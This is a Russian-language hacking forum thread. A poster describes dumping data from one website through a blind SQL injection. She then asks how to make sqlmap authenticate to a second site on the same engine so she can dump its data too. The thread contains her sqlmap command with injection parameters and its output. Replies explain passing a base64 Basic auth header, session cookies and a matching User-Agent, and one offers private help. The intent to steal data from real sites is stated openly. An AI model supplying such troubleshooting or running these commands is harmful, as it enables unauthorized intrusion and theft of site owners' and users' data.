В общем, дела обстоят так. Нашла уязвимый параметр на одном сайте. Оказалось Code: Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Слила всю информацию, всё шикарно Но есть ещё другой сайт на таком же движке. Но чтобы в него зайти, необходима авторизация через php форму. У меня есть логин/пасс к этому второму сайту. Зашла и "внутри" обнаружила, что уязвимость точно такая же как у открытого сайта есть. Теперь вопрос: как авторизоваться через sqlmap нормально, чтобы слить уже данные для второго закрытого сайта? При вводе Code: ./sqlmap.py -u "........../index.php" --auth-type Basic --auth-cred 'username:password' -v 3 --data="param1=1¶m2=2¶m3=3¶mvuln=injecthere" -p paramvuln --level 3 --risk 3 --dbms="MySQL 5" Ответ Code: sqlmap got a 302 redirect to '......./index.php'. Do you want to follow? [Y/n] y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y и дальше уже такое впечатление, что он до нужной локации с уязвимым параметром paramvuln не доходит (на открытом сайте всё раскручивалось ну ооооч быстро) Помогите плиз
После авторизации будет передаваться хидер, типа: Code: Authorization: Basic YWRtaW46YWRtaW4 Где YWRtaW46YWRtaW4=admin:admin. Соответственно, нужно использовать что-то типа: Code: ./sqlmap.py --headers="Authorization: Basic YWRtaW46YWRtaW4" -u "... Вместо YWRtaW46YWRtaW4 берешь логин:пароль, кодируешь в base64 и вставляешь.
Может PHPSESSID генерируется с использованим User-Agent и т.д. и т.п. Попробуй полностью спарсить то, что отправляет браузер и через --headers отправить.
ТС, отпишите в лс, посмотрим на ваш сайт. Вообще, надо просто вставить плюшки после авторизации, иногда нужен идентичный user-agent.